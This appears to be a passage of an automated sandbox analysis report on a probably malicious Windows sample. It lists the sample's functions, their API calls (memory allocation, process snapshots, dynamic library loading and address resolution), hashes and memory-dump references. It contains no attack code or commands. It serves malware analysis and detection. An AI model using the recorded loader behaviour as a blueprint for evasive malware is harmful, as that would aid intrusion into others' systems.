                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e87addc3917c1582652ae1521c80a92d529d285b71a0c17ec3e8cc84417c586a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AD017B17003206FE6209B2ABC0CF873AACEFC9B61B990070FC05C3250D3348846C6A9
                                                                                                                                                                                                                                                  Function 0040106E Relevance: 4.5, APIs: 3, Instructions: 14memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1103761159-0
                                                                                                                                                                                                                                                  • Opcode ID: 5ee9d7473c3924204ca57906dc96219f516d74c2ff55c0a1b6b29943125a55b7
                                                                                                                                                                                                                                                  • Instruction ID: cbeecf13432bd86b07881f9954f5d2781a3b91bd5f6aa0d8a48ab97a10eed13d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ee9d7473c3924204ca57906dc96219f516d74c2ff55c0a1b6b29943125a55b7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EE0B6709087408AE310BF789A09329BAF0BB54702F80467AEC8591165EB7845998A9B
                                                                                                                                                                                                                                                  Function 00401011 Relevance: 3.8, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32 ref: 00401024
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040104A
                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 00401064
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Virtual$AllocFreememset
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3122926387-0
                                                                                                                                                                                                                                                  • Opcode ID: a0a013b6774e571c5b65a47fc1d3d360eda1f497b9a4925a01a31c340fd8a1f6
                                                                                                                                                                                                                                                  • Instruction ID: 953efe50e1cbbb812f06cc3e62367a8be46cf4bdbcb976bc8bbce204aaafe815
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0a013b6774e571c5b65a47fc1d3d360eda1f497b9a4925a01a31c340fd8a1f6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF0273268267467E12032383C09FBBA398AF02B54F905136FD84F32A1E651595541E8
                                                                                                                                                                                                                                                  Function 00A2A346 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A2A36E
                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00A2A38E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A29000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a29000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction ID: 6a2ad3c4d83ee4eea28b7998455e57919677156b49dcdff4fa656b2770428dac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5F0C239600720AFD7207BF9A88DA6E76E8BF58720F100138F646950C0CB70E8454662
                                                                                                                                                                                                                                                  Function 009B0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,009B0223,?,?), ref: 009B0E19
                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,009B0223,?,?), ref: 009B0E1E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction ID: 834e71a4ee2bb256775d8f514e505c58297908d8ee81c6856434322e2576a7f4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31D01232245228B7DB002AD4DC09BCEBB1CDF09BA2F008421FB0DE9080CBB09A4046EA
                                                                                                                                                                                                                                                  Function 00414AE0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00414B18
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1699248803-0
                                                                                                                                                                                                                                                  • Opcode ID: ab4a8321712fcc922be74a85797a0249bd995a8b6693096a5be71d41bf5f0982
                                                                                                                                                                                                                                                  • Instruction ID: 2708b0e3243a0e957b98e2de8dbff298e4be506c05b60b3b5688325687bc23d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab4a8321712fcc922be74a85797a0249bd995a8b6693096a5be71d41bf5f0982
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22F065F56042406FE3109B29DC84D7BBBECEBC8755F00882CF9C897341D6349D15C6A1
                                                                                                                                                                                                                                                  Function 00414AB3 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,?,?,00401F5C,?,00000000,?,0042EEFC), ref: 00414AC8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                  • Opcode ID: e7eeef91b189e3eb156169286097dafbbf83a662e1d22db4b58308e2dade1027
                                                                                                                                                                                                                                                  • Instruction ID: 9a9555821b1b5639991f33a0d047dc28d6ef73e7f338c8467c625410a53c9249
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7eeef91b189e3eb156169286097dafbbf83a662e1d22db4b58308e2dade1027
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8D0A7BB70172A4B5B006EAA1C55CCF530EEFC029A301043FF50093150CA145E0A46A5
                                                                                                                                                                                                                                                  Function 00A2A005 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00A2A056
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A29000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a29000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction ID: 826d0641de8a8984e9bd87409c8158ab794cbf5a6ca53303a7fc9c7ab5b71ce3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A113C79A00208EFDB01DF98CA85E98BBF5AF08750F0580A4F9489B362D371EA50DF81
                                                                                                                                                                                                                                                  Function 00414B34 Relevance: 1.3, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,0040B194,?,?,?,?,?,?,?), ref: 00414B4F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                  • Opcode ID: 0c83796e71d9fd92b85acab00c076ac88b98b03ee52731056f74553e5987f3df
                                                                                                                                                                                                                                                  • Instruction ID: c5585fe1be56caf24d44a51d4f7cb6acd98d7c2f993cc92adb08f3e4ce33ffd0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c83796e71d9fd92b85acab00c076ac88b98b03ee52731056f74553e5987f3df
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61E0D87630D3924B97608EA854C0FA7A79CABD9F41B0A006EFA44D7301D650EC45C778

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 009CC858 Relevance: 119.6, APIs: 67, Strings: 1, Instructions: 649libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,00000031,?,?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE10
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE21
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE32
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE43
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE54
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE65
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE76
                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,009CB2B7,0042EEFC,0042EEFC,0042EEFC), ref: 009CCE87
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FE4), ref: 009CCEDD
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCEF4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF0B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF22
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF39
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FE8), ref: 009CCF58
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF6F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF86
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCF9D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCFB4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCFCB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCFE2
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CCFF9
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FEC), ref: 009CD014
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD02B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD042
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD059
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD070
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FF0), ref: 009CD08F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD0A6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD0BD
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD0D4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD0EB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD102
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FF8), ref: 009CD121
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD138
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD14F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD166
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD17D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD194
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD1AB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD1C2
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD1D9
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645000), ref: 009CD1F4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD20B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD222
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD239
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD250
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645004), ref: 009CD26B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD282
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645008), ref: 009CD29D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD2B4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FF4), ref: 009CD2D3
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD2EA
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD301
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD318
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD32F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD346
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD35D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD374
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FFC), ref: 009CD44B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD462
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD479
